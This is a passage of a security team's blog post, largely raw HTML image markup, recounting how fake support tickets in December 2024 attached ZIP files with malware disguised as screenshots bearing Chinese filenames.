srcset="https://substackcdn.com/image/fetch/$s_!j1eI!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The holiday season is also open season for malware developers and operators. With teams at various companies working with reduced personnel&#8212;some resting at home, others eagerly awaiting their well-deserved break&#8212;it becomes an unmissable opportunity for the ecosystem&#8217;s bad actors.</p><p>While some see this as a problem, we see it as a chance to unwrap early presents and play with these rabid toys one last time before the year-end dinner. Here&#8217;s the story of how some bad actors tried to steal our Christmas, but instead became our Secret Santa.</p><div><hr></div><h2>The client who cried wolf</h2><p>December 2024. It all started with a ticket&#8212;or rather, a flood of them. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7JZf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7JZf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 424w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 848w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 1272w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7JZf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic" width="578" height="318.61801242236027" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:710,&quot;width&quot;:1288,&quot;resizeWidth&quot;:578,&quot;bytes&quot;:58528,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7JZf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 424w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 848w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 1272w, https://substackcdn.com/image/fetch/$s_!7JZf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7e1f739d-029b-4aa4-8887-e609e4c07392_1288x710.heic 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;Do you have support in Chinese?&#8221; / &#8220;I can&#8217;t open the app so I can&#8217;t register&#8221;</figcaption></figure></div><p>Each one came from newly created, empty accounts, written in broken language, and asking for help in our support chat in Chinese.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!29-T!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!29-T!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 424w, https://substackcdn.com/image/fetch/$s_!29-T!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 848w, https://substackcdn.com/image/fetch/$s_!29-T!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 1272w, https://substackcdn.com/image/fetch/$s_!29-T!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!29-T!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic" width="324" height="124.61538461538461" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:190,&quot;width&quot;:494,&quot;resizeWidth&quot;:324,&quot;bytes&quot;:4407,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!29-T!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 424w, https://substackcdn.com/image/fetch/$s_!29-T!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 848w, https://substackcdn.com/image/fetch/$s_!29-T!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 1272w, https://substackcdn.com/image/fetch/$s_!29-T!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0fac11fa-897d-431c-8a21-3cceb20c30f0_494x190.heic 1456w" sizes="100vw"></picture><div></div></div></a><figcaption class="image-caption">&#8220;Human attention&#8221;</figcaption></figure></div><p>And it gets weirder (social engineering at its finest).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uTpo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uTpo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 424w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 848w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 1272w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uTpo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic" width="541" height="393.14906832298135" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:936,&quot;width&quot;:1288,&quot;resizeWidth&quot;:541,&quot;bytes&quot;:66729,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!uTpo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 424w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 848w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 1272w, https://substackcdn.com/image/fetch/$s_!uTpo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff2aa74e1-119a-4f53-86ea-37d845d5b467_1288x936.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">&#8220;Check why my authentication failed&#8221;</figcaption></figure></div><p>The pattern was the same: open a case and immediately attach a ZIP file with Chinese characters in its name, supposedly containing screenshots and additional details.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wA8q!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wA8q!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 424w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 848w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 1272w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wA8q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic" width="471" height="343.15714285714284" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b75d92df-ebaa-4658-8321-a54873814068_840x612.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:612,&quot;width&quot;:840,&quot;resizeWidth&quot;:471,&quot;bytes&quot;:8884,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!wA8q!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 424w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 848w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 1272w, https://substackcdn.com/image/fetch/$s_!wA8q!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb75d92df-ebaa-4658-8321-a54873814068_840x612.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Fake support ticket attaching a suspicious compressed file</figcaption></figure></div><p>When analysed, these files brought us an <em>unexpected</em> Xmas surprise: <strong>free malware!</strong> For some, this might be the digital equivalent of coal, but for us, it&#8217;s a sign that we&#8217;re firmly off the cyber-naughty list.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NM67!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NM67!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 424w, https://substackcdn.com/image/fetch/$s_!NM67!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 848w, https://substackcdn.com/image/fetch/$s_!NM67!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 1272w, https://substackcdn.com/image/fetch/$s_!NM67!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NM67!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic" width="479" height="263.11267605633805" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:468,&quot;width&quot;:852,&quot;resizeWidth&quot;:479,&quot;bytes&quot;:14753,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!NM67!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 424w, https://substackcdn.com/image/fetch/$s_!NM67!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 848w, https://substackcdn.com/image/fetch/$s_!NM67!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 1272w, https://substackcdn.com/image/fetch/$s_!NM67!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb41cbf1b-effa-43b9-a228-5c8387dd8fa5_852x468.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Another suspicious compressed file</figcaption></figure></div><p>Let&#8217;s take a look at our gift.</p><div><hr></div><h2>Not your usual Chinese tale</h2><p>We&#8217;ve all heard of Chinese tales once in our lifetime, but this one is different and falls apart as a scam pretty easily:</p><ul><li><p>As stated before, the ZIP file names contain Simplified Chinese characters like &#8220;<em>Android &#33258;&#30001;&#25130;&#22270;_20241220</em>&#8221; (<em>Android Free Screenshot_20241220</em>) or &#8220;<em>&#22270;&#29255;_20241224 (2)</em>&#8221; (<em>Image_20241224 (2)</em>).</p></li><li><p>Inside of them, executable files can be found, again, with Simplified and Traditional Chinese characters in their names like &#8220;<em>&#22270;&#29255;_20241224.exe</em>&#8221; (<em>Image_20241224.exe - Simplified Chinese</em>), &#8220;<em>&#22294;&#29255;2024122288jpg.exe</em>&#8221; (<em>Image2024122288jpg.exe - Traditional Chinese</em>), or &#8220;<em>&#22270;&#29255;_20241220.exe</em>&#8221; (<em>Image_20241220.exe - Simplified Chinese</em>).</p></li><li><p>These executables communicate with servers hosted on China&#8217;s Alibaba Cloud.</p></li><li><p>And also for the little simple fact that we do not serve clients in the Chinese market&#8230;</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!36vO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!36vO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F915d56e9-2a44-4839-a8c1-e654e2d9dfb2_1856x818.heic 424w, 